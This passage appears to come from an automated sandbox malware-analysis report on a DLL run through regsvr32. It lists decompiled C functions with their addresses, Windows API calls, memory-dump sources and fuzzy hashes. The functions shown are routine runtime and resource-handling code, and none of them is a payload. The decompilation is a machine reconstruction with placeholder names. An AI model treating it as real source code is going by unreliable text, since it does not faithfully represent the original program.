				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x100b5ed0);
				E100491EC(__ebx, __edi, __esi);
				_t31 = E100516CA(__edx, __edi, _t35);
				_t15 =  *0x100bab24; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E1004ED25(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x100baa28; // 0x29214a8
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x100ba600;
								if(__eflags != 0) {
									_push(_t33);
									E100470E9(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x100baa28; // 0x29214a8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x100baa28; // 0x29214a8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E100580D6();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E1004C299(_t25, _t29, _t31, 0x20);
				}
				return E10049231(_t33);
			}










                                                                                                                0x1005803b
                                                                                                                0x1005803b
                                                                                                                0x1005803b
                                                                                                                0x1005803b
                                                                                                                0x1005803d
                                                                                                                0x10058042
                                                                                                                0x1005804c
                                                                                                                0x1005804e
                                                                                                                0x10058056
                                                                                                                0x10058077
                                                                                                                0x1005807d
                                                                                                                0x10058081
                                                                                                                0x10058084
                                                                                                                0x10058087
                                                                                                                0x1005808d
                                                                                                                0x1005808f
                                                                                                                0x10058091
                                                                                                                0x10058094
                                                                                                                0x1005809a
                                                                                                                0x1005809c
                                                                                                                0x1005809e
                                                                                                                0x100580a4
                                                                                                                0x100580a6
                                                                                                                0x100580a7
                                                                                                                0x100580ac
                                                                                                                0x100580a4
                                                                                                                0x1005809c
                                                                                                                0x100580ad
                                                                                                                0x100580b2
                                                                                                                0x100580b5
                                                                                                                0x100580bb
                                                                                                                0x100580bf
                                                                                                                0x100580bf
                                                                                                                0x100580c5
                                                                                                                0x100580cc
                                                                                                                0x1005805e
                                                                                                                0x1005805e
                                                                                                                0x1005805e
                                                                                                                0x10058063
                                                                                                                0x10058067
                                                                                                                0x1005806c
                                                                                                                0x10058074

                                                                                                                APIs
                                                                                                                  • Part of subcall function 100516CA: __getptd_noexit.LIBCMT ref: 100516CB
                                                                                                                  • Part of subcall function 100516CA: __amsg_exit.LIBCMT ref: 100516D8
                                                                                                                • __amsg_exit.LIBCMT ref: 10058067
                                                                                                                • __lock.LIBCMT ref: 10058077
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 10058094
                                                                                                                • InterlockedIncrement.KERNEL32(029214A8), ref: 100580BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2880340415-0
                                                                                                                • Opcode ID: d750480f2ed67ca9fda060e2d8013d0ebf7c7263f22f59e314d0f65cb8b0c4a1
                                                                                                                • Instruction ID: 2c66c78485f96dee5787b1674e8c8abefd5a4d64d588bf85caaf56f3e5aa2c90
                                                                                                                • Opcode Fuzzy Hash: d750480f2ed67ca9fda060e2d8013d0ebf7c7263f22f59e314d0f65cb8b0c4a1
                                                                                                                • Instruction Fuzzy Hash: 0B01ED39D00721ABEB90DB648845B9D73E0FB09761F200115EC00B32D0C734BE9ACBD2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1004078C Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SysStringLen.OLEAUT32(?), ref: 1004079C
                                                                                                                • SysStringByteLen.OLEAUT32(?), ref: 100407C0
                                                                                                                • SysStringByteLen.OLEAUT32(?), ref: 100407C7
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 100407E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Byte$Free
                                                                                                                • String ID:
                                                                                                                • API String ID: 103498640-0
                                                                                                                • Opcode ID: 85b4450f0673325f1efc7afb0754e52e6b19ddb51d71fbb30c35447615560f90
                                                                                                                • Instruction ID: fbd26468a5088b80c8e1d66cb20216ddacdf45072072ccf4a8a1e50c8cc5e636
                                                                                                                • Opcode Fuzzy Hash: 85b4450f0673325f1efc7afb0754e52e6b19ddb51d71fbb30c35447615560f90
                                                                                                                • Instruction Fuzzy Hash: A3F06D75A05119BBDF119F65CD89C8FBEB9EF452D472100B9F405E2110EA71EE10DA94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10009A9F Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E10009A9F(void* __ebx, void* __ecx, void* __edi, struct tagPOINT _a8, signed int _a12) {
				void* __ebp;
				int _t18;
				signed int _t23;
				void* _t36;
				void* _t37;
				void* _t38;

				_t36 = __edi;
				_t32 = __ecx;
				_t31 = __ebx;
				_push(_a12);
				_t37 = __ecx;
				_t18 = PtInRect(__ecx + 0x60, _a8.x);
				_t39 = _t18;
				if(_t18 == 0) {
					L10001262(_t37,  &_a8, _a8.x, _a12);
					_t34 =  *((intOrPtr*)(_t37 + 0x58));
					_t23 = _a12 * 0x18 + _a8;
					__eflags = _t23;
					 *((intOrPtr*)(_t37 + 0x5c)) =  *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x58)) + _t23 * 4));
					SendMessageA( *(E10013FEA(__ebx, _t34, _t38, GetParent( *(_t37 + 0x20))) + 0x20), 0x401, 1, 0);
				} else {
					 *(_t37 + 0x54) = 1;
					E10013FEA(__ebx, _t32, _t38, SetCapture( *(_t37 + 0x20)));
				}
				return E10013F46(_t31, _t37, _t36, _t39);
			}









                                                                                                                0x10009a9f
                                                                                                                0x10009a9f
                                                                                                                0x10009a9f
                                                                                                                0x10009aa3
                                                                                                                0x10009aa6
                                                                                                                0x10009aaf
                                                                                                                0x10009ab5
                                                                                                                0x10009ab7
                                                                                                                0x10009add
                                                                                                                0x10009ae5
                                                                                                                0x10009aeb
                                                                                                                0x10009aeb
                                                                                                                0x10009af4
                                                                                                                0x10009b0f
                                                                                                                0x10009ab9
                                                                                                                0x10009abc
                                                                                                                0x10009aca
                                                                                                                0x10009aca
                                                                                                                0x10009b1e

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CaptureMessageParentRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2415874315-0
                                                                                                                • Opcode ID: 399e86d69f144f64d7a1cf1da985b58b00c05c7788515ef81abaed7b49b9f8e9
                                                                                                                • Instruction ID: 25e861961322638c5cc13c1cb93cfac8c952e232febe04a89418918ddb91ce9b
                                                                                                                • Opcode Fuzzy Hash: 399e86d69f144f64d7a1cf1da985b58b00c05c7788515ef81abaed7b49b9f8e9
                                                                                                                • Instruction Fuzzy Hash: 28017179604719EFEF109F60CC89E8A7BB9FF08714F008419F9468A661D776E520DF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100121B1 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100121B1(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;
				void* _t21;
				void* _t22;
				void* _t23;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E10021BD1(_t21, _t22, _t23, _a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						return 1;
					}
				}
			}










                                                                                                                0x100121bb
                                                                                                                0x10012220
                                                                                                                0x00000000
                                                                                                                0x100121c3
                                                                                                                0x100121c3
                                                                                                                0x100121c9
                                                                                                                0x00000000
                                                                                                                0x100121e6
                                                                                                                0x100121ef
                                                                                                                0x100121fb
                                                                                                                0x10012201
                                                                                                                0x10012207
                                                                                                                0x1001220b
                                                                                                                0x1001220b
                                                                                                                0x10012215
                                                                                                                0x00000000
                                                                                                                0x1001221d
                                                                                                                0x100121c9

                                                                                                                APIs
                                                                                                                • GetObjectA.GDI32(00000000,0000000C,?), ref: 100121EF
                                                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 100121FB
                                                                                                                • GetSysColor.USER32 ref: 1001220B
                                                                                                                • SetTextColor.GDI32(00000000,?), ref: 10012215
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$ObjectText
                                                                                                                • String ID:
                                                                                                                • API String ID: 829078354-0
                                                                                                                • Opcode ID: 056738f1dbb01ff9727d5d93c506c385d49c7b0d9dd5cda1d16c97d0f571fc3e
                                                                                                                • Instruction ID: 67b1fd4cb3906346164cf3f103316e4a66c3f8fc6138dac16c0a882264e53a5f
                                                                                                                • Opcode Fuzzy Hash: 056738f1dbb01ff9727d5d93c506c385d49c7b0d9dd5cda1d16c97d0f571fc3e
                                                                                                                • Instruction Fuzzy Hash: 23014B70940109FBEF42DF64ED85AAE3AEAEB16380F504520FD02D81E0D776CAE0CA51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100175A3 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100175A3(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E1001715A(_t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E1001E302(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}















                                                                                                                0x100175a7
                                                                                                                0x100175a9
                                                                                                                0x100175ab
                                                                                                                0x100175af
                                                                                                                0x100175b1
                                                                                                                0x100175e6
                                                                                                                0x100175f0
                                                                                                                0x100175f2
                                                                                                                0x100175f9
                                                                                                                0x100175f9
                                                                                                                0x00000000
                                                                                                                0x100175ff
                                                                                                                0x100175b8
                                                                                                                0x100175c5
                                                                                                                0x100175cd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100175d1
                                                                                                                0x100175d7
                                                                                                                0x100175db
                                                                                                                0x100175e4
                                                                                                                0x00000000
                                                                                                                0x100175e4
                                                                                                                0x10017605

                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 100175C5
                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001BAC6,?,?,1000853E,0BB35530), ref: 100175D1
                                                                                                                • LockResource.KERNEL32(00000000,?,?,?,?,1001BAC6,?,?,1000853E,0BB35530), ref: 100175DE
                                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,1001BAC6,?,?,1000853E,0BB35530), ref: 100175F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: 3aaac21b0ef2c8b63035e737b3131aca2a8ee90a1bb553a8d0e70c6f11b13852
                                                                                                                • Instruction ID: 7948c032a4c72716df5e771d6e8d2f206c4fca0a3d528dd7194fd61f1b252fe8
                                                                                                                • Opcode Fuzzy Hash: 3aaac21b0ef2c8b63035e737b3131aca2a8ee90a1bb553a8d0e70c6f11b13852
                                                                                                                • Instruction Fuzzy Hash: 1AF0903A2006216FD3019B664C88A7BBABDFFC66E27050079FE08D7251DE75CD4186B1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001C001 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E1001C001(intOrPtr __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t22;
				struct HINSTANCE__* _t23;

				_t18 = __edx;
				_push(__ecx);
				_push(_t22);
				_push(_t19);
				_v8 = __ecx;
				_t14 = 0;
				_t23 =  *(E1001E302(0, _t19, _t22, __eflags) + 0xc);
				_t20 = LoadResource(_t23, FindResourceA(_t23, _a4, 5));
				_t27 = _t20;
				if(_t20 != 0) {
					_t14 = LockResource(_t20);
				}
				_t9 = E1001BC23(_t14, _v8, _t18, _t20, _t23, _t27, _t14, _a8, _t23);
				FreeResource(_t20);
				return _t9;
			}















                                                                                                                0x1001c001
                                                                                                                0x1001c004
                                                                                                                0x1001c006
                                                                                                                0x1001c007
                                                                                                                0x1001c008
                                                                                                                0x1001c00b
                                                                                                                0x1001c012
                                                                                                                0x1001c029
                                                                                                                0x1001c02b
                                                                                                                0x1001c02d
                                                                                                                0x1001c036
                                                                                                                0x1001c036
                                                                                                                0x1001c040
                                                                                                                0x1001c048
                                                                                                                0x1001c054

                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1001C01B
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1001C023
                                                                                                                • LockResource.KERNEL32(00000000), ref: 1001C030
                                                                                                                • FreeResource.KERNEL32(00000000,00000000,?,?), ref: 1001C048
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: 827473ef3e72b1209851eb1e6ca0238e8683fc6564f1af58fdf33cb5959af9ad
                                                                                                                • Instruction ID: 17b7ca83f3fe0b1c6abb568bf059af7570cb479962814bbe8024a2d76e27436e
                                                                                                                • Opcode Fuzzy Hash: 827473ef3e72b1209851eb1e6ca0238e8683fc6564f1af58fdf33cb5959af9ad
                                                                                                                • Instruction Fuzzy Hash: 0AF05E3A600624BFD7019BA98D8DDDFBBACEF5B6A17044095FA0597211DA79DE008BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100259DA Relevance: 6.0, APIs: 4, Instructions: 32memorystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 62%
                                                                                                                			E100259DA(short* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t13;
				void* _t15;
				void* _t18;
				void* _t23;
				intOrPtr _t25;
				short* _t27;
				void* _t28;

				_t23 = __edx;
				_t19 = __ecx;
				_t13 = E1004764D(0x1008f9c8, _t18, __edi, __esi);
				_t27 = __ecx;
				__imp__#9(__ecx, 0x224);
				_t25 =  *((intOrPtr*)(_t28 + 8));
				 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				 *__ecx = 8;
				if(_t25 != 0) {
					_push(_t25);
					if( *((short*)(_t28 + 0xc)) != 0xe) {
						L4:
						_t15 = E10025809(_t18, _t28 - 0x230, _t25, _t27, _t32);
						_t7 = _t28 - 4;
						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
						_t9 = _t15 + 0xc; // 0xc
						 *(_t27 + 8) = E10024C7E(_t18, _t9, _t23, _t25, _t27);
						_t13 = E10025299(_t18, _t28 - 0x230,  *_t7);
					} else {
						_t13 = lstrlenA();
						__imp__#150(_t25, _t13);
						_t32 = _t13;
						 *(_t27 + 8) = _t13;
						if(_t13 == 0) {
							E1000A035(_t18, _t19, _t25, _t27, _t32);
							goto L4;
						}
					}
				}
				return E10047725(_t13);
			}










                                                                                                                0x100259da
                                                                                                                0x100259da
                                                                                                                0x100259e4
                                                                                                                0x100259e9
                                                                                                                0x100259ec
                                                                                                                0x100259f2
                                                                                                                0x100259f5
                                                                                                                0x100259fb
                                                                                                                0x10025a00
                                                                                                                0x10025a07
                                                                                                                0x10025a08
                                                                                                                0x10025a24
                                                                                                                0x10025a2a
                                                                                                                0x10025a2f
                                                                                                                0x10025a2f
                                                                                                                0x10025a33
                                                                                                                0x10025a41
                                                                                                                0x10025a44
                                                                                                                0x10025a0a
                                                                                                                0x10025a0a
                                                                                                                0x10025a12
                                                                                                                0x10025a18
                                                                                                                0x10025a1a
                                                                                                                0x10025a1d
                                                                                                                0x10025a1f
                                                                                                                0x00000000
                                                                                                                0x10025a1f
                                                                                                                0x10025a1d
                                                                                                                0x10025a08
                                                                                                                0x10025a4e

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100259E4
                                                                                                                • VariantClear.OLEAUT32 ref: 100259EC
                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,00000224), ref: 10025A0A
                                                                                                                • SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 10025A12
                                                                                                                  • Part of subcall function 1000A035: __CxxThrowException@8.LIBCMT ref: 1000A049
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocByteClearException@8H_prolog3StringThrowVariantlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 103272278-0
                                                                                                                • Opcode ID: a03163d6efae831f1220c955f7c88dcc41e9ab63c78cc7d2f5363c402911c247
                                                                                                                • Instruction ID: a60bc55f71c44e27e2e3c2ff32b84eedb9fa8c598236bbb949332012621262c7
                                                                                                                • Opcode Fuzzy Hash: a03163d6efae831f1220c955f7c88dcc41e9ab63c78cc7d2f5363c402911c247
                                                                                                                • Instruction Fuzzy Hash: 56F0C2358102009FE710EFA0D88A79DB3F4FF51352F61844CF44696161EFB8AA84CB16
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001BF72 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001BF72() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E10017979(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E1001B96C(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
